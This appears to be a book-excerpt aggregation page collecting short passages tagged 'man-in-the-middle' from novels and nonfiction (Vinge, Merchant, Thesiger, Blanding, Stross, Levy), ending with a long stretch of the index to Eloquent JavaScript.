'Too calm,' I whispered to Quick as we watched the barkeep slowly mop the floor and deny any shooting in his establishment Then Quick supplied the clue." "The slop the barman mopped was red. Beer is not red, and yet red blood is," said Quick. "I then spotted three men sitting too close together against the wall, and commanded them to move. They did, and the man in the middle fell over, dead. Such was their surprise that we refrained from having to 'stick them' with our lead nightsticks, thus avoiding many months of work with Cohen around the gnawing question of guilt. A dangerous time." "The raw red time when words give way to acts," said Quick. "We must all take care," said the redhead.


Rainbows End by Vernor Vinge

disinformation, Drosophila, failed state, Future Shock, MITM: man-in-the-middle, pneumatic tube, technological singularity, Vernor Vinge

If this is the scam, you will be the heroes of the day, my hands in disabling those little boxes you and your friends planted — but your fame will likely be posthumous. My condolences! (2)To sabotage some component of the labs, maybe in a way that won’t become evident till much later disasters. This is almost as stupid as (1). (3)To install (or cover) some fiendishly clever Man-in-the-Middle software that gives Alfred de facto ownership of research done in that part of lab that you, Robert, infested for him. This would be cool, and it is my personal favorite (see my discussion of fruit flies in Chapter 3). Unfortunately for Alfred, this caper is so far blown that I doubt it will survive the audits that will surely come raining down.


pages: 416 words: 129,308

The One Device: The Secret History of the iPhone by Brian Merchant

Airbnb, animal electricity, Apollo Guidance Computer, Apple II, Apple's 1984 Super Bowl advert, Black Lives Matter, Charles Babbage, citizen journalism, Citizen Lab, Claude Shannon: information theory, computer vision, Computing Machinery and Intelligence, conceptual framework, cotton gin, deep learning, DeepMind, Douglas Engelbart, Dynabook, Edward Snowden, Elon Musk, Ford paid five dollars a day, Frank Gehry, gigafactory, global supply chain, Google Earth, Google Hangouts, Higgs boson, Huaqiangbei: the electronics market of Shenzhen, China, information security, Internet of things, Jacquard loom, John Gruber, John Markoff, Jony Ive, Large Hadron Collider, Lyft, M-Pesa, MITM: man-in-the-middle, more computing power than Apollo, Mother of all demos, natural language processing, new economy, New Journalism, Norbert Wiener, offshore financial centre, oil shock, pattern recognition, peak oil, pirate software, profit motive, QWERTY keyboard, reality distortion field, ride hailing / ride sharing, rolodex, Shenzhen special economic zone , Silicon Valley, Silicon Valley startup, skeuomorphism, skunkworks, Skype, Snapchat, special economic zone, speech recognition, stealth mode startup, Stephen Hawking, Steve Ballmer, Steve Jobs, Steve Wozniak, Steven Levy, TED Talk, Tim Cook: Apple, Tony Fadell, TSMC, Turing test, uber lyft, Upton Sinclair, Vannevar Bush, zero day

“Once you’re connected to the network, they could start trying to throw attacks at your phone… But for the most part, the Pineapple is more for sniffing traffic.” If I logged on to Gmail, for instance, the hackers could force me to go somewhere else, a site of their choosing. Then they could launch a man-in-the-middle attack. “If you went to Facebook and went to your bank account, they’d be able to see that information too,” he says. “So, yeah, you just want to be careful not to connect to any Wi-Fi.” Okay, but how common is this, really? “Pineapples?” Ronnie says. “I can go buy one for a hundred, a hundred twenty bucks.


pages: 403 words: 138,026

Arabian Sands by Wilfred Thesiger

back-to-the-land, clean water, Etonian, Fellow of the Royal Society, MITM: man-in-the-middle, the market place

I could have gone to Bahrain by aeroplane from Sharja but I preferred to go there by dhow. The journey should have taken four days but lasted eleven. The naukhada, or skipper, was an old man, nearly blind, who spent most of his time asleep on the poop. The mate, an energetic Negro, described what he saw and the naukhada told him where to go. Once he woke the old man in the middle of the night to consult him. The naukhada gave his orders, but when the mate said ‘Nonsense, Uncle!’, he went grumbling back to sleep. The first night it blew a gale. The seas broke over the ship and I was very sick. We had to shelter under the Persian coast, and there we remained for three days, since the wind, when it moderated, was against us.


pages: 385 words: 133,839

The Coke Machine: The Dirty Truth Behind the World's Favorite Soft Drink by Michael Blanding

"World Economic Forum" Davos, An Inconvenient Truth, carbon footprint, classic study, clean water, collective bargaining, corporate social responsibility, Exxon Valdez, Gordon Gekko, Internet Archive, laissez-faire capitalism, market design, military-industrial complex, MITM: man-in-the-middle, Naomi Klein, Nelson Mandela, New Journalism, Pepsi Challenge, Ponzi scheme, profit motive, Ralph Nader, rolodex, Ronald Reagan, shareholder value, stock buybacks, The Theory of the Leisure Class by Thorstein Veblen, The Wealth of Nations by Adam Smith, Thorstein Veblen, union organizing, Upton Sinclair, Wayback Machine

“But it would destroy me as a person if anything happened to her.” After the initial spate of violence, the threats against the union subsided somewhat, but not before Galvis himself was subject to attack. He was driving home with his bodyguards in August 2003, when he turned the corner to find a man in the middle of the street pointing a pistol at the car. One of his bodyguards opened the door to shoot, and the man started firing. After a few exchanges of gunfire, the assailant drove off on his mo­ torbike, and Galvis reported the incident to the police as an attempt on his life. He heard nothing until 2007 when the attorney general’s office informed him there was an investigation against him for making a false claim.


Jennifer Morgue by Stross, Charles

Boeing 747, call centre, Carl Icahn, correlation does not imply causation, disinformation, disintermediation, dumpster diving, Dutch auction, Etonian, haute couture, interchangeable parts, Maui Hawaii, messenger bag, MITM: man-in-the-middle, mutually assured destruction, operational security, PalmPilot, planetary scale, RFID, Seymour Hersh, Silicon Valley, Skype, slashdot, stem cell, telepresence, traveling salesman, Turing machine

SLIDE 3: Grainy black-and-white photographs, evidently taken from TV screens: a long cylindrical structure grasped in the claws of an enormous grab. From below, thin streamers rise up towards it. "BLUE HADES took exception to the intrusion into their territory and chose to exercise their salvage rights under Article Five, Clause Four of the Benthic Treaty. Hence the tentacles. Now ..." SLIDE 1 (Repeat): This time the man in the middle is circled with a red highlighter. "This fellow in the middle is Ellis Billington, as he looked thirty years ago. Ellis was brilliant but not well socialized back then. He was attached to the 'B' team as an observer, tasked with examining the circuitry of the cipher machine they hoped to recover from the sub's control room.


pages: 468 words: 137,055

Crypto: How the Code Rebels Beat the Government Saving Privacy in the Digital Age by Steven Levy

Albert Einstein, Bletchley Park, Claude Shannon: information theory, cognitive dissonance, Compatible Time-Sharing System, computer age, disinformation, Donald Knuth, Eratosthenes, Extropian, Fairchild Semiconductor, information security, invention of the telegraph, Jim Simons, John Gilmore, John Markoff, John Perry Barlow, Kevin Kelly, knapsack problem, Marc Andreessen, Mitch Kapor, MITM: man-in-the-middle, Mondo 2000, Network effects, new economy, NP-complete, quantum cryptography, Ronald Reagan, Saturday Night Live, Silicon Valley, Simon Singh, Stephen Hawking, Steven Levy, Watson beat the top human players on Jeopardy!, web of trust, Whole Earth Catalog, zero-sum game, Zimmermann PGP, éminence grise

She scrambles it with Bob’s public key, and only Bob can unscramble it. But what if Alice has never met Bob—how does she get his public key? If she asks him for it directly, she can’t encode her request (obviously not, because she doesn’t have his public key yet, which she would use to encrypt the message). So a potential eavesdropper, Eve, could act as “a man in the middle,” and snatch that message en route. Then Eve, pretending to be Bob, could send her own public key to Alice, falsely representing it as Bob’s key. (This deceptive masquerade is known as “spoofing.”) If Alice is duped, she’ll encode her secret message to Bob with the key. Alas, Bob won’t be able to read anything scrambled with that key—only tricky Eve can.


pages: 560 words: 135,629

Eloquent JavaScript: A Modern Introduction to Programming by Marijn Haverbeke

always be closing, Charles Babbage, domain-specific language, Donald Knuth, en.wikipedia.org, Firefox, fizzbuzz, functional programming, higher-order functions, hypertext link, job satisfaction, MITM: man-in-the-middle, premature optimization, slashdot, web application, WebSocket

., 2 leaf node, 229 leak, 225, 285 learning, 2, 6, 371 left (CSS), 240–242, 244 LEGO, 168 length property for arrays, 61, 336 for strings, 53, 56, 61, 74, 409 less than, 16 let keyword, 24, 25, 43, 65, 75, 76, 130 level, 266, 267, 273, 275, 284 Level class, 267 lexical scoping, 44 library, 230, 334, 356, 357 license, 169 line, 24, 32, 161, 287, 289–294, 307, 420 line break, 14, 161 line comment, 35, 156 line drawing, 350, 424 line width, 290, 297 lines of code, 211 lineTo method, 290–291 lineWidth property, 290 link (HTML tag), 277 linked list, 79, 410, 426 links, 222, 230–231, 251, 252, 344 linter, 173 Liskov, Barbara, 96 list (exercise), 79, 410 listen method, 360 listening (TCP), 220, 360 literal expression, 23, 146, 206, 208 live data structure, 227, 233, 240, 419 live view, 372, 373, 387, 426 lives (exercise), 285 load event, 258, 295–296, 303, 326, 421 LoadButton class, 344 local binding, 48, 215, 409 local scope, 43, 212 localhost, 360 localStorage object, 326–327, 383 locked box (exercise), 141, 413 logging, 133 logical operators, 17 long polling, 372–374, 378, 380, 385 loop, 4, 30, 32, 37, 38, 50, 69, 85, 90, 91, 160, 189, 408, 409, 420 termination of, 33 loop body, 31, 85 lycanthropy, 60, 66 M machine code, 3, 213, 391 macro-optimization, 406 magic, 99, 203 mailRoute array, 123 maintenance, 169 malicious script, 224 man-in-the-middle, 317 map, 272, 321 map (data structure), 104 Map class, 105, 109, 195 map method, 88, 91, 94, 99, 104, 120, 191, 268, 340 Marcus Aurelius, 246 match method, 149, 159 matching, 146, 151, 152, 158, 164 algorithm, 152–154 Math object, 56, 61, 75 Math.abs function, 76, 424 Math.acos function, 75 Math.asin function, 75 Math.atan function, 75 Math.ceil function, 76, 278, 302–303 Math.cos function, 75, 241, 242, 421 mathematics, 50, 86 Math.floor, 76, 122, 278, 302–303 Math.max function, 27, 61, 74, 75, 302 Math.min function, 27, 56, 75, 302 Math.PI constant, 75, 293 Math.random function, 75, 122, 271, 330, 404 Math.round function, 76 Math.sin function, 75, 241, 242, 271, 281 Math.sqrt function, 68, 75, 411 Math.tan function, 75 Matrix class, 107–108, 335 matrix example, 107–108, 111 MatrixIterator class, 108 max-height (CSS), 275–276 maximum, 27, 75, 90 max-width (CSS), 275–276 McConnell, Steve, 390 Meadowfield, 117 measurement, 397 measuring, 399 measuring a robot (exercise), 125, 412 media type, 317, 329, 365 meetups, JavaScript, 371 memory, 3, 11 call stack, 24 organization, 12, 47, 60, 65, 77 persistence, 387 speed, 181, 213, 400, 402, 406 structure sharing, 79 mesh, 221 message event, 259 meta key, 252 metaKey property, 252, 349 method, 62, 100, 101 array, 71 HTTP, 312, 317, 360, 367, 373, 375 interface, 98 method attribute, 313 method call, 98 method property, 315 methods object, 363 micro-optimization, 397, 399, 406 Microsoft, 225 Middle East, graph of, 393 mime package, 365 MIME type, 329, 365 mini application, 326 minifiers, 175 minimalism, 265 minimum, 27, 56, 75 minimum (exercise), 56, 408 minus, 13, 165 Miró, Joan, 332 mirror, 298, 308, 421 mirroring, 297–298 MKCOL method, 368–369, 425 mkdir function, 368–369, 425 modification date, 366 modifier key, 252 modular robot (exercise), 177, 414 modularity, 97, 334 module, 168, 169, 177, 272, 355, 356, 375 design, 175 module loader, 355 module object, 172 module system, 169 modulo (remainder) operator, 14, 33, 297, 407, 408, 418, 420 Mongolian vowel separator, 162 monster (exercise), 285, 419 Mosaic, 225 motion, 266 mouse, 26 button, 249, 250, 253 cursor, 253 mouse trail (exercise), 262, 418 mousedown event, 250, 253, 255, 337, 338, 422 mousemove event, 254, 260–262, 338, 350, 418 mouseup event, 253–255 moveTo method, 290, 293 Mozilla, 225 multiple attribute, 324, 325 multiple-choice, 318–319, 323, 324 multiplication, 13, 269–270, 280 multiplier function, 49 music, 265 mutability, 63, 65, 120 N name attribute, 320, 324 namespace, 75 naming, 4, 5, 25–26 NaN (not a number), 14, 17, 18, 130 negation, 16, 17 neighbor, 330, 422 neighbors property, 190 nerd, 158 nesting of arrays, 67 of expressions, 23, 205 of functions, 44 of loops, 38, 408 of objects, 228, 231 in regular expressions, 154 of scope, 44 Netscape, 5, 225 network, 182, 219, 372 abstraction, 194, 316 protocol, 220 reliability, 188 security, 317 speed, 174, 181, 353 network function, 194 new operator, 101 newline character, 14, 38, 147, 156, 161, 268, 422 next method, 107, 197, 412 nextSibling property, 230 Nietzsche, Friedrich, 226 node, 228, 229 node program, 354 node-fetch package, 361 Node.js, 6, 7, 27, 171, 183, 353–369, 372, 373, 375, 387, 398 NodeList type, 230, 239 node_modules directory, 355, 356 nodeName property, 243 nodeType property, 229, 418, 419 nodeValue property, 231 nonbreaking space, 162 normalizing, 396 not a number (NaN), 14, 17, 18, 129 notation, 173 note-taking example, 327 notification, 372 NPM, 169, 171, 173, 174, 176, 177, 355–358, 365, 375, 376, 387, 415 npm program, 356, 357, 365 null, 18, 19, 51, 61, 77, 80, 134 number, 12, 65, 146, 165, 414 conversion to, 19, 28 notation, 12–13 precision of, 13 representation, 12 special values, 14 Number function, 28, 35 number puzzle example, 50–52 Number.isNaN function, 29 O object, 59, 63–65, 97, 112 creation, 77, 101, 328, 401, 403 identity, 65 as map, 272 as module, 169 mutability, 65 property, 27, 61, 75, 76, 99 representation, 77 Object prototype, 99, 100 object shape, 404 Object.assign function, 328, 336 Object.create function, 100, 104, 211 Object.keys function, 64, 80, 195, 410, 417 object-oriented programming, 97, 101, 105, 106, 111, 119, 175 Object.prototype, 104 observation, 399 obstacle, 277, 278 offsetHeight property, 235, 236 offsetWidth property, 235 on method, 362 onclick attribute, 224, 248 onclick property, 337 OpenGL, 289 opening tag, 222 operator, 13, 16, 19, 204, 210, 404 application, 13 optimization, 50, 55, 236, 260, 266, 275, 306, 308, 359, 392, 398–400, 403, 406, 426 option (HTML tag), 319, 324, 425 optional, in pattern, 148 optional arguments, 48, 78 options property, 324 ordering, 220 ordinal package, 171–172 organic growth, 167 organization, 167 outline, 289 output, 16, 26, 27, 133, 134, 211, 353, 422 overflow (CSS), 275–276 overflow, with numbers, 12 overlap, 278 overlay, 238 overriding, 103, 105, 111, 415 overwriting, 367, 369, 378 P p (HTML tag), 222, 235 package, 168, 171, 355, 357 package (reserved word), 26 package manager, 169 package.json file, 357 padding (CSS), 274 page reload, 258, 321, 326 pageX property, 253, 255 pageXOffset property, 236 pageY property, 253, 255 pageYOffset property, 236, 257 Palef, Thomas, 265 panning, 339 paragraph, 222 parallelism, 182, 313 parameter, 27, 42, 43, 46–48, 74, 76, 99, 131, 172 parent node, 249 parentheses arguments, 23, 41, 46, 85, 204 expression, 13 in regular expressions, 149, 151, 152, 162, 413 statement, 27, 29, 31, 33 parentNode property, 230 parse function, 207 parseApply function, 206 parseExpression function, 205 parseINI function, 161, 168 parsing, 77, 129, 161, 203–206, 208, 211, 223, 227, 364, 380 password, 317 password field, 318 path canvas, 290–293, 420 closing, 291 file system, 355, 363 URL, 312, 315, 363, 364, 373, 375 path package, 365 pathfinding, 123, 176, 193, 343 pathfinding (exercise), 405, 406, 426 patience, 350 pattern, 145–147, 157 pausing (exercise), 285, 419 pea soup, recipe analogy, 84 peanuts, in weresquirrel example, 70–71 percent sign, 314 percentage, 94, 257 performance, 154, 174, 212, 236, 266, 306, 359, 391, 393, 397, 399 period character, 27, 61, 74, 147, 156, 165, 336 persistence, 326, 372, 387, 425 persistent data structure, 119, 120, 126, 132, 335, 342, 346, 419 persistent group (exercise), 126 persistent map (exercise), 413 PGroup class, 126, 413 phase, 271, 281 phi coefficient, 66–68 phi function, 68, 76 phone, 252 physics, 277, 281, 393, 418 physics engine, 278 pi, 13, 75, 241, 271, 293 PI constant, 75, 242 pick function, 343 picture, 287, 288, 296, 306, 334, 346 Picture class, 335, 345 picture property, 335 PictureCanvas class, 337, 349 pictureFromImage function, 345 pie chart example, 294, 295, 307, 420 ping request, 190 pink, 336 pipe analogy, 220 pipe character, 152, 414 pipe method, 364, 367 pipeline, 175 pixel, 235, 242, 253, 267, 273, 288, 289, 295, 296, 302, 306, 308, 333, 335, 339, 342, 343, 345, 350, 423 pixel art, 296 PixelEditor class, 340, 347, 349 pizza, in weresquirrel example, 67 platform game, 265, 285 Plauger, P.J., 128 player, 265–267, 275, 278, 281, 284, 296, 303, 305 Player class, 270, 281 plus character, 13, 148, 165 pointer, 230 pointer events, 253–256, 337 pointerPosition function, 338 polling, 247 pollTalks function, 385 polymorphism, 105–106 pop method, 62, 71 Popper, Karl, 234 port, 220, 311, 360 pose, 296 position, of elements on screen, 236 position (CSS), 240, 244, 257, 266, 275 POST method, 313, 314, 321, 374 postMessage method, 259 power example, 42, 48, 50 precedence, 13, 17, 239 predicate function, 88, 92, 95 Prefer header, 374, 380, 385 premature optimization, 50 preventDefault method, 251, 256–258, 282, 321, 339, 423 previousSibling property, 230 primitiveMultiply (exercise), 141, 413 privacy, 225 private (reserved word), 26 private properties, 98, 141–142 process object, 354–355, 364–365 processor, 181, 400 profiling, 50, 399 program, 2, 23, 28 program size, 83, 84, 164, 272 programming, 1 difficulty of, 2 history of, 3 joy of, 1, 2 Programming Is Terrible, 166 programming language, 1–2 creating, 203, 213 DOM, 229 history of, 3 machine language and, 391 Node.js and, 354 power of, 5 programming style, 3, 24, 32, 35, 272 progress bar, 256 project chapter, 117, 203, 265, 333, 371 promise, 200, 416 Promise class, 186, 187, 189, 195, 197, 198, 200, 315, 326, 359, 361, 363, 386, 416 Promise.all function, 190, 199, 200, 416 Promise.reject function, 187 Promise.resolve function, 186, 190 promises package, 359 promptDirection function, 139 promptInteger function, 134 propagation, of events, 249, 250, 257, 258 proper lines (exercise), 350, 424 property access, 27, 61, 129, 348, 403 assignment, 63 definition, 63, 66, 109 deletion, 63, 98 inheritance, 99, 101, 103 model of, 63 naming, 105–107 testing for, 64 protected (reserved word), 26 protocol, 220, 221, 311–312 prototype, 99–104, 111, 211, 215, 417, 426 diagram, 103 prototype property, 101 pseudorandom numbers, 75 public (reserved word), 26 public properties, 98 public space (exercise), 369, 425 publishing (packages), 358 punch card, 3 pure function, 55, 79, 88, 175, 330, 422 push method, 62, 69, 71, 411, 426 pushing data, 372 PUT method, 312–313, 363, 367, 373, 378, 425 Pythagorean theorem, 411, 423 Python, 391 Q quadratic curve, 292 quadraticCurveTo method, 292, 420 query string, 314, 374, 380 querySelector method, 240, 417 querySelectorAll method, 239, 324 question mark, 18, 148, 157, 314 queue, 198 quotation mark, 14, 165 quoting in JSON, 77 of object properties, 63 quoting style (exercise), 165, 413 R rabbit example, 98, 100–102 radians, 242, 293, 298 radio buttons, 318, 323 radius, 350, 423 radix, 11 raising (exceptions), 135 random numbers, 75, 271 random-item package, 414 randomPick function, 122 randomRobot function, 122 range, 88, 147, 148 range function, 5, 78, 409 Range header, 316 ray tracer, 306 readability, 4, 5, 35, 50, 54, 135, 167, 208, 276, 307 readable stream, 361, 362, 364, 378 readAsDataURL method, 345 readAsText method, 326 readdir function, 359, 366, 425 readdirSync function, 425 read-eval-print loop, 354 readFile function, 172, 358, 425 readFileSync function, 359, 424 reading code, 6, 117 readStorage function, 184 readStream function, 378, 379 real-time events, 247 reasoning, 17 recipe analogy, 84 record, 62 rect (SVG tag), 288 rectangle, 266, 278, 289, 307, 342 rectangle function, 342, 423 recursion, 47, 50, 56, 80, 189, 195, 205, 206, 208, 231, 243, 300, 394, 408, 410, 413, 416, 418 reduce method, 89, 91, 94, 95, 340, 411 redundancy, 397 ReferenceError type, 215 RegExp class, 146, 157, 424 regexp golf (exercise), 164 regular expressions, 145–165, 206, 368, 375, 376, 417, 424 alternatives, 152 backtracking, 153 boundary, 151 creation, 146, 157 escaping, 146, 158, 414 flags, 149, 155, 157, 414 global, 155, 158, 159 grouping, 149, 155 internationalization, 162 matching, 152, 158 methods, 146, 150, 158 repetition, 148 rejecting (a promise), 187, 189, 198 relative path, 172, 224, 355, 363, 425 relative positioning, 240, 241 relative URL, 315 remainder (modulo) operator, 14, 33, 297, 407, 408, 418, 420 remote access, 363 remote procedure call, 316 removeChild method, 232 removeEventListener method, 248, 419 removeItem method, 326 rename function, 359 rendering, 289 renderTalk function, 384 renderTalkForm function, 385 renderUserField function, 383 repeat method, 73, 257 repeating key, 251 repetition, 52, 148, 154, 157, 260 replace method, 155, 165, 413 replaceChild method, 233, 418 replaceSelection function, 322 reportError function, 383 repulsion, 393, 395 request, 185, 189, 220, 312, 313, 321, 360, 361, 367, 372 request function, 189, 361, 362 request type, 185 requestAnimationFrame function, 241, 258, 260, 283, 308, 418 requestType function, 190 require function, 171, 172, 178, 355, 356, 365, 375 reserved words, 26 resolution, 172, 355 resolve function, 364 resolving (a promise), 186, 187, 189, 198 resource, 220, 221, 312, 313, 317, 363, 377 response, 185, 189, 312, 313, 316, 360, 364, 366 Response class, 315 responsiveness, 247, 353, rest parameters, 74 restore method, 299, 300 result property, 326 retry, 189 return keyword, 42, 47, 101, 196, 408, 411 return value, 27, 42, 134, 185, 410 reuse, 54, 112, 167–169, 356 reverse method, 79 reversing (exercise), 79, 409 rgb (CSS), 274 right-aligning, 243 rmdir function, 366, 368 roadGraph object, 118 roads array, 117 roads module (exercise), 177, 415 robot, 117, 119, 121, 123, 125, 177 robot efficiency (exercise), 125, 412 robustness, 373 root, 229 rotate method, 298, 300 rotation, 307, 420 rounding, 76, 134, 278, 279, 302, 424 router, 372, 375 Router class, 375, 376 routeRequest function, 194 routeRobot function, 123 routing, 192 rows, in tables, 243 Ruby, 391 rules (CSS), 238, 239 run function, 211 runAnimation function, 283, 285 runGame function, 284, 285 runLayout function, 396 runLevel function, 283, 285 running code, 7 runRobot function, 121, 412 run-time error, 132–134, 140, 417 Rust (programming language), 391 S Safari, 225 sandbox, 7, 59, 224, 227, 316 save method, 299, 300 SaveButton class, 344 scalar replacement of aggregates, 400, 402 scale constant, 337–339 scale method, 297, 299 scaling, 273, 296, 297, 303, 421 scalpel (exercise), 200, 416 scheduling, 197, 354 scientific notation, 13, 165 scope, 43, 44, 48, 168, 170–173, 208, 210, 214, 215, 417 script (HTML tag), 223, 224, 258 SCRIPTS data set, 87, 89, 92, 93, 95 scroll event, 256, 260 scrolling, 251, 256–257, 275–276, 282, 301 search method, 158 search problem, 124, 152, 154, 232, 368, 405 search tool (exercise), 368, 424 section, 161 Secure HTTP, 221, 317, 361 security, 224, 225, 316, 317, 325, 327, 364, 375 select (HTML tag), 319, 324, 327, 334, 340, 425 selected attribute, 324 selection, 322 selectionEnd property, 322 selectionStart property, 322 selector, 239 self-closing tag, 222 semantic versioning, 357 semicolon, 23, 24, 33, 237 send method, 185, 188 sendGossip function, 191 sep binding, 364–365 sequence, 148 serialization, 77 server, 220, 221, 311–313, 315, 316, 353, 360, 362, 363, 372, 375 session, 328 sessionStorage object, 328 set, 146, 147, 229 Set (data structure), 113, 126 Set class, 113, 126, 413 set method, 105 setAttribute method, 235, 337 setInterval function, 260, 296 setItem method, 326 setter, 110 setTimeout function, 184, 197, 259, 260, 380, 386 shape, 287, 290, 291, 293, 295, 307 shapes (exercise), 307, 420 shared property, 100, 103 SHIFT key, 252, 423 shift method, 71 shiftKey property, 252 short-circuit evaluation, 20, 51, 209, 411 SICP, 202 side effect, 24, 27, 34, 42, 54, 65, 79, 88, 159, 175, 199, 230, 232, 233, 236, 290, 299, 314, 334, 335 sign, 12, 165, 414 sign bit, 12 signal, 11 simplicity, 213 simulation, 119, 121, 265, 270, 330, 393, 418 sine, 75, 241, 271, 281 single-quote character, 14, 165, 224 singleton, 126 skill, 333 SkillShareApp class, 386 skill-sharing project, 371–373, 375, 381 skipSpace function, 206, 214 slash character, 13, 35–36, 146, 156, 315, 364, 425 slice method, 72, 73, 88, 233, 409, 416 slope, 424 sloppy programming, 261 smooth animation, 241 SMTP, 220 social factors, 349 socket, 372–373 some method, 92, 95, 191, 376, 426 sorting, 229 source property, 158 special form, 203, 208 special return value, 134, 135 specialForms object, 208 specificity, 239 speed, 1, 2, 308, 421 SpiderMonkey, 400 spiral, 307, 420 split method, 118, 268 spread, 74, 336 spread operator, 274 spring, 393, 395 sprite, 296, 303–304 spy, 256 square, 28 square brackets, 60, 61, 74, 76, 107, 147, 324, 328, 409 square example, 41–42, 45, 46 square root, 68, 75, 411 src attribute, 222, 224 stack, see call stack stack overflow, 47, 50, 56, 408 stack trace, 136 staged compilation, 392 standard, 5, 26, 35, 88, 136, 162, 349, 354, 355 standard environment, 26 standard output, 354, 362–363 standards, 219, 225 star, 307, 420 Star Trek insignia, 292 startPixelEditor function, 347 startState constant, 347 startsWith method, 364 stat function, 359, 365, 366, 425 state of application, 275, 334, 342, 346, 347, 388 in binding, 24, 31, 32, 34, 400 of canvas, 289, 299 in iterator, 197 in objects, 119, 268, 301 transitions, 198, 336, 337 statement, 23, 24, 28, 31, 32, 42, 63 static (reserved word), 26 static file, 373, 376 static method, 110, 113, 268, 413 static typing, 403 Stats type, 366 statSync function, 425 status code, 312, 354–355 status property, 315, 383 stdout property, 362–363 stopPropagation method, 250 storage function, 187 stream, 220, 361–363, 364, 367, 378 strict mode, 130 string, 14, 60, 62, 65, 92 indexing, 56, 72, 74, 92, 149 length, 37, 92 methods, 73, 149 notation, 14 properties, 72 representation, 15 searching, 73 String function, 28, 105 stroke method, 290–292 strokeRect method, 289, 421 strokeStyle property, 290 strokeText method, 295 stroking, 289, 290, 295, 306 strong (HTML tag), 235, 237 structure, 168, 222, 227, 334 Structure and Interpretation of Computer Programs, 202 structure sharing, 79 style, 237 style (HTML tag), 238, 239 style attribute, 237–239, 273 style sheet, see CSS subclass, 111 submit, 318, 320, 321 submit event, 321, 384, 425 substitution, 54 subtraction, 13, 113 sum function, 5, 78 summing (exercise), 78, 409 summing example, 4, 83, 89, 211 superclass, 111 survey, 294 Sussman, Gerald, 202 SVG, 287–289, 305, 306 swapping bindings, 424 swipe, 342 switch keyword, 34 symbiotic relationship, 183 symbol, 106 Symbol function, 106 Symbol.iterator symbol, 107 SymmetricMatrix class, 111 synchronization, 387, 426 synchronous programming, 182, 195, 359, 368 syncState method, 335, 338, 340, 341, 349, 426 syntax of Egg, 203, 204 error, 26, 129, 130 expression, 23 function, 42, 45 identifier, 26 number, 12, 165 object, 63 operator, 13 statement, 24, 26, 28–34, 135 string, 14 syntax tree, 204–205, 207, 228–229 SyntaxError type, 206 T tab character, 14, 32 TAB key, 320 tabbed interface (exercise), 262, 419 tabindex attribute, 252, 320, 349 table (HTML tag), 243, 266, 274, 422 table example, 417 tableFor function, 68 tables, 67, 68, 274 tags, 221–222, 227, 239, see also names of specific tags talk, 371, 372, 377–379 talkResponse method, 380 talksAbout function, 231 talkURL function, 383 Tamil, 87 tampering, 317 tangent, 75 target property, 250 task management example, 71 TCP, 220, 221, 311, 373 td (HTML tag), 243, 274 Tef, 166 temperature example, 110 template, 171, 388, 426 template literals, 15 tentacle (analogy), 25, 63, 65 terminal, 354 termite, 183 ternary operator, 18, 20, 209 test method, 146 test runners, 132 test suites, 132 testing, 125, 132 text, 14, 221, 222, 227, 229, 295, 305–307, 322, 324, 358, 422 text field, 257, 318, 319, 322 text method, 315 text node, 229, 231, 233, 419 text wrapping, 305 text-align (CSS), 243 textAlign property, 295, 420 textarea (HTML tag), 260, 318, 322, 327, 330, 425 textBaseline property, 295, 420 textContent property, 418, 422 TEXT_NODE code, 229, 419 textScripts function, 94, 411 th (HTML tag), 243 then method, 186–188, 191, 416 theory, 133 this binding, 62, 98–99, 101, 130 thread, 182, 183, 198, 259 throw keyword, 135, 136, 139, 141, 413 tile, 303 time, 147, 148, 150, 184, 241, 261, 277, 278, 280, 283, 303, 346 time zone, 150 timeline, 182, 197, 223, 241, 247, 258 timeout, 188, 259, 373, 374, 380 Timeout class, 189 times method, 269 timing, 396 title, 382 title (HTML tag), 222, 223 toDataURL method, 344 toLowerCase method, 62, 243 tool, 145, 164, 175, 334, 339, 340, 342–344, 347, 350, 357 tool property, 335 ToolSelect class, 340 top (CSS), 240–242, 244 top-level scope, see global scope toString method, 99, 100, 103–105, 346, 362 touch, 255, 334 touchend event, 255 touches method, 278 touches property, 255, 339 touchmove event, 255, 339, 350 touchstart event, 255, 337, 339 toUpperCase method, 62, 132, 243, 362 tr (HTML tag), 243, 274 trackKeys function, 282, 285 transform (CSS), 287 transformation, 297–299, 308, 420 translate method, 298, 299 Transmission Control Protocol, 220, 221, 311, 373 transparency, 289, 296, 346 transpilation, 213 trapezoid, 307, 420 traversal, 152 tree, 100, 204, 229 treeGraph function, 394 trial and error, 133, 282, 293 triangle (exercise), 37, 407 trigonometry, 75, 241 trim method, 73, 268 true, 16 trust, 224 try keyword, 136, 137, 190, 413, 422 type, 12, 16, 112 type attribute, 318, 321 type checking, 131, 174 type coercion, 18, 19, 28 type observation, 392, 401, 403 type property, 204, 249 type variable, 131 typeof operator, 16, 80, 410 TypeScript, 131–132 typing, 260 typo, 129 U Ullman, Ellen, xx unary operator, 16, 23 uncaught exception, 138, 188 undefined, 18, 19, 25, 42, 47, 61, 63, 77, 129, 130, 134 underline, 237 underscore character, 26, 35, 98, 151, 157 undo history, 346, 347 UndoButton class, 347 Unicode, 15, 17, 87, 92, 147, 162, 163 unicycling, 371 Uniform Resource Locator, see URL uniformity, 204 uniqueness, 239 unit (CSS), 242, 257 Unix, 366–368 Unix time, 150 unlink function, 359, 366 unshift method, 71 unwinding the stack, 135 upcasing server example, 362 updated method, 378, 381, 425 updateState function, 336 upgrading, 169 upload, 325 URL, 221, 224, 288, 313, 315, 317, 360, 373, 383 URL encoding, 314 url package, 364, 380 urlToPath function, 364 usability, 251 use strict, 130 user experience, 247, 320, 372, 383 user interface, 138, 334 users’ group, 371 UTF-8, 358, 359 UTF-16, 15, 92 V V8, 398 validation, 134, 140, 203, 277, 321, 378, 379 value, 12, 186 value attribute, 318, 322, 324 var keyword, 25, 43, 76 variables, see also binding Vec class, 113, 268, 269, 280, 394, 396, 421 vector, 394, 400 vector (exercise), 113, 411 vector graphics, 295 verbosity, 46, 182 version, 169, 222, 312, 357, 398 viewport, 275–277, 301, 302, 305 VillageState class, 119 virtual keyboard, 252 virtual world, 117, 119, 121 virus, 224 vocabulary, 41, 84 void operator, 26 volatile data storage, 12 W waitForChanges method, 380 waiting, 184 walking, 303 warning, 357 wave, 271, 280, 281 web, see World Wide Web web application, 5, 326, 333 web browser, see browser web page, 174 web worker, 259 WebDAV, 369 webgl (canvas context), 289 website, 224, 225, 313, 353, 369, 371 WebSockets, 373 weekDay module, 169–170 weekend project, 369 weresquirrel example, 60, 62, 64, 66, 69, 71 while loop, 4, 30, 32, 53, 160 whitespace in HTML, 231, 340, 419 indentation, 32 matching, 147, 162 syntax, 204, 206, 214, 417 trimming, 73, 268 in URLs, 373–374 Why’s (Poignant) Guide to Ruby, 22 width property, 350, 423 window, 